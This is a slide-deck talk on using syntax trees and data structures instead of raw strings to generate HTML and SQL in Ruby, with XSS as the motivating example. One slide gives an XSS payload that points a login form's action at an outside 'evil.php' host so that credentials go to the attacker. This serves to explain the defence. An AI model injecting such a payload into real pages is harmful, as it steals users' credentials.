Your browser doesn't support the features required by impress.js, so you are presented with a simplified version of this presentation.

For the best experience please use the latest Chrome, Safari or Firefox browser.

tl;dr (in Haiku)

For formal language

Avoid plain strings at all cost

Use data structures

Language

langue, taal, sprache, 語言

platypus s sentence subject subject s--subject action action s--action place place s--place platypus platypus subject--platypus verb verb action--verb object object action--object forest forest place--forest carry carry verb--carry chicken chicken object--chicken

A platypus is carrying a chicken in the forest

Magic of language

Formal Language

a formal language is

a set of strings of symbols

governed by strict rules

These rules form the grammar

of the language, they specify

how to generate valid strings

alphabet = {0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
            +, *, (, ), =}

<equation>   ::= <expression> = <expression>

<expression> ::= <number>  | <sum> |
                 <product> | ( <expression> )

<number>     ::= <digit> | <digit> <number>

<digit>      ::= 0 | 1 | 2 | 3 | 4 |
                 5 | 6 | 7 | 8 | 9

<sum>        ::= <expression> + <expression>

<product>    ::= <expression> * <expression>

well-formed :

5 = 3 + 2
4 * 4 = 10 + 6
10 + 20 = ( 3 + 5 ) * 7

 

not well-formed :

5 = + 5
10 = 15 - 5
3 * 5 + 7
_anonymous_0 exp1 expression sum sum exp1--sum eq = exp2 expression product product exp2--product num1 number digit1 digit num1--digit1 plus + num2 number digit2 digit num2--digit2 num3 number digit3 digit num3--digit3 times * num4 number digit4 digit num4--digit4 5 5 digit1--5 3 3 digit2--3 2 2 digit3--2 4 4 digit4--4 equation equation equation--exp1 equation--eq equation--exp2 sum--num1 sum--plus sum--num2 product--num3 product--times product--num4

The meaning of a sentence

corresponds with

its syntax tree

Language is everywhere

Your application either

consumes or generates

these languages

In either case it should

use syntax trees

to do so

Why ?

XSS

Cross site scripting

XSS

Code like this

"<div>#{ @post.body }</div>"

   

Will lead to malicious injection

document.getElementById('login_form').
  action="http://208.246.24.14/evil.php"

session hijacking

attacker can surf the site with user credentials

Escape!

The common wisdom is to "escape" the inserted value

<div>#{ escape_html(@post.body) }</div>

   

Now the code is harmless

<div>
  &lt;script&gt;document.getElementById('login_form').action=http://208.246.24.14/evil.php&lt;/script&gt;
</div>

XSS

Is a more common

vulnerability than

buffer overflows

[CVE-2013-1857] XSS Vulnerability
in the sanitize helper of Ruby on Rails

  — @tenderlove on rails-security-ann

Given all the fun we've had with security issues

  — Rails 4 beta announcement

 

why is it so hard?

 

What side of the escape are we on?

Steps to reproduce

escape_html(
  escape_html(
    'ó'.force_encoding('ISO-8859-1')
       .encode('UTF-8')
       .sub('Ã', '&atilde;')
       .sub('³','&sup3;')))

Manual escaping? hard

Let's automate!

# using HTML::SafeBuffer
<div><%= @post.body %></div>

And it just works

We've turned the problem around

Whitelist instead of blacklist

def helper
  "<p> haikus are pretty <p>".html_safe
end

 

We're still manually deciding what (not) to escape

The problem

Semantics of string are twofold

commmunication z1 c x1 y1 x1->y1 y1->z1 z2 y1->z2 z3 y1->z3 aa y1->aa serializer serializer network network serializer->network parser parser network->parser bb parser->bb aa->serializer b bb->b a a->b b->c d b->d e b->e
commmunication z1 c f c->f g c->g h g->h x1 y1 x1->y1 y1->z1 z2 y1->z2 z3 y1->z3 aa y1->aa serializer serializer network network serializer->network parser parser network->parser bb parser->bb aa->serializer b bb->b a a->b b->c d b->d e b->e
commmunication c f c->f g c->g h g->h y1 ??? aa y1->aa network network parser parser network->parser bb parser->bb aa->network b bb->b a a->b b->c d b->d e b->e

this is not a new concept

we already do this for SQL

@users = User.where(name: params[:query])
ar relation #<AR::Relation> SELECT SELECT relation--SELECT star field * name field name users table users query string "query" SELECT--star FROM FROM SELECT--FROM WHERE WHERE SELECT--WHERE FROM--users eq eq WHERE--eq eq--name eq--query
def helper
  "<p> haikus are pretty <p>".html_safe
end
html_safe string String "<p> haikus are pretty <\p>" @html_safe=true

HTML

Language, a set of strings

Browsers accept every string

Is this a language?

Postel's principle

Be conservative in what you send

be liberal in what you accept

 

Be conservative in what you send

 

 

be liberal in what you accept

 

 

HTML "parsers" are rewriting engines

To stay safe we should stay strict

Let someone else handle this hairy mess

Why? (cont.)

in case security

is not enough for you

higher level of abstraction

is more expressive

and more productive

How?

Shopping list

  1. A solid data type for syntax trees
  2. quality parsers/generators
  3. problem domain specific APIs to deal with 1.

Apples and snakes architecture

Keep the snakes out of the app

parse/generate at the app boundary

Inside the app, only apples

Building trees

Constructing literals

The data structure must be

composable and

easy to reason about

Objects

@doc = Nokogiri::HTML::Document.new
@html = Nokogiri::XML::Element.new('html', @doc)
@doc << @html
@doc.to_html

Builder syntax

HTML::Builder.new do
  html do
    body do
      p 'hello, world'
    end
  end
end

Templating

%div
  .big
    = "Hello RuLu"

S-expressions

('p ('em "hello, world"))

 

[:p, [:em, "hello, world"]]

Now you can actually program your HTML

class MyController
  def index
    page = SignupPage.new
    if request.post?
      page.rewrite(PopulateFormFields.new(params))
    end
    render Layout.new(page)
  end
end

Hexp

Demo

https://github.com/plexus/hexp

In summary

Don't serialize by hand

Don't reinvent the wheel (badly)

mixing s11n with logic violates SRP

Let a library do the serialization for you

Aim high level

You care about semantics

the closest representation

is the syntax tree

More expressive power

Data structures are programmable

they make your code

more powerful and expressive

Oh and BTW

injection attacks

Q ?

Thank you!

References

Blog posts

Books

Security

Software

Ruby

Common Lisp

Haskell